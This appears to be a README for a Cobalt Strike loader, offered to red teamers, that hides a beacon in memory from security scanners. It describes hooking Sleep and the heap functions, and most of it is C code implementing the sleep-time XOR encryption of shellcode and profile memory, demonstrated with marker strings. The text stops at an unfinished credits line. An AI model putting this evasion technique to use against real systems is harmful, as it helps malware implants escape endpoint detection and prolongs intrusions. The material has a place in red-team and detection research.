A Cobalt Strike memory evasion loader for red teamers. Supports x86/x64 stager and stageless payloads with a profile (tested on Windows 7/10 and Windows Server 2012).
- Hooks Sleep, CreateProcessA, HeapCreate and GetProcessHeap before the shellcode is loaded into memory.
- Creates a new heap for the beacon's profile. When the beacon calls GetProcessHeap or HeapCreate, the hook returns the handle of that new heap instead.
- When the beacon calls Sleep, the hook encrypts the memory regions holding the beacon and its profile, and decrypts them again once the sleep has finished.
- A 64-bit beacon calls GetProcessHeap to obtain the memory for its profile.
- A 32-bit beacon does not call GetProcessHeap for this. It calls HeapCreate to create a new heap and allocates the profile storage from that heap.
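The following is an added example written for this README, not code from the project. It models the two hooks described above: the heap hooks hand the beacon one private region, and the Sleep hook XOR-encrypts both the shellcode and that region for the whole sleep and restores them before the beacon resumes. Installing the hooks (IAT or inline patching) is out of scope, and the private heap is a static arena standing in for a fixed-size HeapCreate heap so the logic compiles and runs on any platform; the names `hooked_*`, `g_real_sleep`, `run_demo` and the marker strings are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <time.h>
#endif

/* A region the loader must hide while the beacon sleeps. */
struct region { uint8_t *base; size_t len; };

static struct region g_beacon;        /* where the shellcode was written      */
static struct region g_profile;       /* the private heap holding the profile */

/* Stand-in for the private heap (assumption: the real loader would get a
 * contiguous region from HeapCreate with a fixed maximum size). */
static uint8_t g_profile_arena[256];

/* Trampoline to the original Sleep. A hook saves the real entry point here
 * before patching; the demo below swaps in a probe. */
typedef void (*sleep_fn)(uint32_t ms);
static void real_sleep_ms(uint32_t ms) {
#ifdef _WIN32
    Sleep(ms);
#else
    struct timespec ts = { ms / 1000, (long)(ms % 1000) * 1000000L };
    nanosleep(&ts, NULL);
#endif
}
sleep_fn g_real_sleep = real_sleep_ms;

/* Fresh key for every sleep from a xorshift generator (constructed seed;
 * a real loader would use a CSPRNG). */
static uint32_t g_rng = 0x9E3779B9u;
static void next_key(uint8_t key[16]) {
    for (int i = 0; i < 16; i++) {
        g_rng ^= g_rng << 13; g_rng ^= g_rng >> 17; g_rng ^= g_rng << 5;
        key[i] = (uint8_t)g_rng;
    }
}

/* XOR is its own inverse, so one routine both hides and restores. */
static void xor_region(struct region r, const uint8_t key[16]) {
    for (size_t i = 0; i < r.len; i++)
        r.base[i] ^= key[i & 15];
}

/* What the beacon ends up calling instead of the Win32 originals. */
void *hooked_GetProcessHeap(void) { return g_profile_arena; }   /* 64-bit path */
void *hooked_HeapCreate(uint32_t opts, size_t initial, size_t maximum) {
    (void)opts; (void)initial; (void)maximum;   /* beacon's request is ignored */
    return g_profile_arena;                      /* 32-bit path */
}
void hooked_Sleep(uint32_t ms) {
    uint8_t key[16];
    next_key(key);
    xor_region(g_beacon, key);     /* shellcode unreadable while asleep   */
    xor_region(g_profile, key);    /* so is the profile on the private heap */
    g_real_sleep(ms);
    xor_region(g_profile, key);
    xor_region(g_beacon, key);     /* plaintext again before beacon resumes */
}

/* ---- demonstration: constructed markers stand in for real contents ---- */
static const char MARK[] = "beacon-shellcode";
static const char PROF[] = "profile-data";
static int g_hidden_during_sleep;

/* Installed as the "real" Sleep: checks both regions are scrambled at the
 * moment the beacon is asleep, which is when a scanner would look. */
static void probe_sleep(uint32_t ms) {
    (void)ms;
    g_hidden_during_sleep =
        memcmp(g_beacon.base, MARK, sizeof MARK) != 0 &&
        memcmp(g_profile.base, PROF, sizeof PROF) != 0;
}

/* Returns 1 if contents were hidden during sleep and intact afterwards. */
int run_demo(void) {
    static uint8_t shellcode[64];
    memcpy(shellcode, MARK, sizeof MARK);
    g_beacon  = (struct region){ shellcode, sizeof shellcode };
    g_profile = (struct region){ g_profile_arena, sizeof g_profile_arena };

    /* The beacon asks for a heap; either hook hands back the private one. */
    uint8_t *heap = hooked_GetProcessHeap();
    if (heap != hooked_HeapCreate(0, 0, 0)) return 0;
    memcpy(heap, PROF, sizeof PROF);

    g_real_sleep = probe_sleep;    /* observe instead of really sleeping */
    hooked_Sleep(1000);
    g_real_sleep = real_sleep_ms;

    int intact = memcmp(shellcode, MARK, sizeof MARK) == 0 &&
                 memcmp(heap, PROF, sizeof PROF) == 0;
    return g_hidden_during_sleep && intact;
}

int main(void) {
    printf("hidden during sleep and restored after: %s\n",
           run_demo() ? "yes" : "no");
    return 0;
}
```

Keeping the original Sleep behind a function pointer is what makes the hook testable: the probe sees exactly the memory state a scanner would see mid-sleep, and the round trip confirms the beacon gets its bytes back unchanged. A real loader would replace the XOR with a proper cipher and draw the key from a CSPRNG.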
This project would not have been possible without the following: